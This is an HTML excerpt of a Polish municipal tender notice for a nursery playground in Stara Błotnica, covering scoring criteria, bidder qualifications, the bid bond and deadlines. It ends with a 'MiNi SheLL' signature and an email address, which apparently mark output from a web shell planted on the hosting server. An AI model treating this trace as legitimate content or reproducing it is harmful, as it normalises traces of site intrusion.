<br/>Kryterium nr 2 <br/>Wykonawca w treści formularza ofertowego poda okres udzielonej gwarancji. <br/>Oferta z zaoferowanym najdłuższym okresem gwarancji otrzyma najwyższą ilość punktów, tj. 40 pkt. <br/>i oceniana będzie odpowiednio: <br/> <br/>-	zaoferowany okres gwarancji 60 miesięcy – oferta otrzyma 40 pkt, <br/>-	zaoferowany okres gwarancji 48 miesięcy – oferta otrzyma 20 pkt, <br/>-	- zaoferowany okres gwarancji 36 miesięcy – oferta otrzyma 10 pkt. <br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy, ofercie przyznana zostanie maksymalna ilość punktów w niniejszym kryterium. <br/>Jeżeli Wykonawca zaoferuje okres gwarancji krótszy niż 36 miesięcy, ofercie zostanie przyznane 0 pkt.<br/>UWAGA: Dla potrzeb oceny ofert, Zamawiający przyjmuje, iż 1 pkt = 1% <br/>19.3	O wyborze najkorzystniejszej oferty zadecyduje najwyższa ilość punktów uzyskanych łącznie w obu kryteriach. <br/>19.4	W toku badania i oceny ofert, Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>7.2. O udzielenie zamówienia, mogą ubiegać się wykonawcy, którzy spełnią warunki dotyczące: <br/>7.2.1. zdolności do występowania w obrocie gospodarczym Zamawiający nie określa szczególnych wymagań. <br/>7.2.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów <br/>Zamawiający nie określa szczególnych wymagań. <br/>7.2.3. sytuacji ekonomicznej lub finansowej <br/> <br/>a)	w zakresie sytuacji ekonomicznej: <br/>Zamawiający nie określa szczególnych wymagań. <br/> <br/>b)	w zakresie sytuacji finansowej: <br/>Zamawiający nie określa szczególnych wymagań. <br/>7.2.4. zdolności technicznej i zawodowej <br/> <br/>	a) w zakresie posiadanego doświadczenia: <br/>Wykonawca spełni warunek, jeżeli wykaże, że wykonał w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie: <br/>-	co najmniej 2 (dwie) roboty budowlane, polegające na budowie /rozbudowie /przebudowie /placu zabaw lub zagospodarowanie terenu o wartości nie mniejszej niż 1 000 000,00 zł brutto (słownie: jeden milion złotych). <br/>b) w zakresie osób zdolnych do wykonania zamówienia: <br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia w tym, co najmniej: <br/>-	co najmniej jedną osobą, która będzie pełniła funkcję kierownika budowy, posiadającą: uprawnienia budowlane kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń ; <br/> <br/>-	co najmniej jedną osobą, która będzie pełniła funkcję kierownika robót, posiadającą: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń <br/> <br/>-	co najmniej jedną osobą, która będzie pełniła funkcję kierownika robót, posiadającą: uprawnienia budowlane kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń ; <br/><br/>7.3. Zamawiający, w stosunku do wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza aby: <br/>-	warunek dotyczący posiadanego doświadczenia – spełnił jeden z wykonawców (samodzielnie); <br/>-	warunek dotyczący osób zdolnych do wykonania zamówienia – spełnili wykonawcy łącznie. <br/>-	warunek dotyczący sytuacji ekonomicznej wykonawcy – spełnili wykonawcy łącznie; <br/>7.4. W przypadku, o którym mowa w pkt. 7.3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia, dołączają do oferty oświadczenie, z którego będzie wynikać, które odpowiednio: roboty budowlane/ usługi / dostawy będą wykonywać poszczególni wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują: <br/>9.4.1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 2 do SWZ; <br/>9.4.2. w celu potwierdzenia spełniania warunku wskazanego w pkt. 7.2.4a) SWZ – wykaz robót budowlanych spełniających wymagania określone w pkt. 7.2.4a) SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których te roboty budowlane zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane lub nadal są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane (były wykonane należycie) były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – (wg. wzoru przedstawionego przez Zamawiającego na dalszym etapie postępowania); <br/>9.4.3. w celu potwierdzenia spełniania warunku wskazanego w pkt. 7.2.4b) SWZ – wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, spełniających wymagania wskazane w pkt. 7.2.4b) SWZ wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, nazw i adresów inwestorów obiektów, okresów wykonywania prac przy obiektach, wartości robót oraz informacją o podstawie do dysponowania tymi osobami – (wg. wzoru przedstawionego przez Zamawiającego na dalszym etapie postępowania). <br/>9.4.4. oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt. 9.1, w zakresie podstaw wykluczenia z postępowania wskazanych w pkt. 8.1 SWZ – wzór oświadczenia, stanowi Załącznik nr 3 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 16.1 Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/> <br/>25 000 zł (słownie: dwadzieścia pięć tysięcy złotych) <br/> <br/>16.2 Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. <br/>16.3 Wadium może być wnoszone w jednej lub kilku następujących formach: <br/>1)	pieniądzu <br/>2)	gwarancjach bankowych, <br/>3)	gwarancjach ubezpieczeniowych, <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości /Dz. U. z 2020 r. poz. 299 ze zm./ <br/>16.4	Wadium wnoszone w formie pieniężnej należy wnieść przelewem na konto Zamawiającego: Bank Spółdzielczy Rzemiosła w Radomiu O/Stara Błotnica <br/> Nr 94 9115 0002 0050 0500 0215 0003, z dopiskiem: wadium na: „Budowa placu zabaw wraz z zagospodarowaniem terenu przy Publicznym Żłobku w Starej Błotnicy” <br/>16.5	Za skuteczne wniesienie wadium w formie pieniężnej, zostanie przyjęte wadium,, które w terminie składania ofert, tj.: do dnia 28.04.2025 do godz. 10:00, znajdzie się na koncie Zamawiającego. <br/>16.6 Wadium, wniesione w innej formie niż pieniężnej musi spełniać co najmniej poniższe wymagania:<br/> 1) musi obejmować odpowiedzialność poręczyciela lub gwaranta za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie, bez potwierdzania tych okoliczności; <br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta bądź poręczyciela do zapłaty całej kwoty wadium; <br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie; <br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z uwzględnieniem, iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; <br/>6)	beneficjentem poręczenia lub gwarancji jest: Zamawiający, tj. Gmina Stara Błotnica; <br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy), Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum); <br/>8)	musi zostać złożone w postaci elektronicznej, opatrzone kwalifikowanym podpisem elektronicznym przez wystawcę poręczenia lub gwarancji. <br/>16.7	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy zostanie odrzucona. <br/>16.8	W przypadku wniesienia wadium w formie: <br/>1)	pieniężnej - zaleca się, by dowód dokonania przelewu został dołączony do oferty; <br/>2)	poręczeń lub gwarancji - wymaga się, by oryginał dokumentu został złożony wraz z ofertą zgodnie z pkt. 16.7 ppkt 8) powyżej. <br/> 16.9 Zasady zwrotu oraz okoliczności zatrzymania wadium określa ustawa. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11.8.3	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w Rozdziale IX SWZ – pkt. 9.1 składa każdy z wykonawców wspólnie ubiegający się o zamówienie. Oświadczenie to ma potwierdzać spełnienie warunków udziału w postępowaniu, brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu i brak podstaw wykluczenia z postępowania. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 22.6.1 Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z wyjątkiem przewidzianych przez Zamawiającego okoliczności, tj.: <br/>-	możliwości zmiany zawartej umowy w stosunku do treści oferty w zakresie uregulowanym w art. 454 – 455 Pzp.; <br/>-	okoliczności wskazanych w załączniku do SWZ – Projektowanych postanowieniach umowy. <br/>Zakres zmian umowy dokładnie opisany w załączniku nr5 do SWZ Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty składane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy e- zamówienia dostępnej pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-28 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com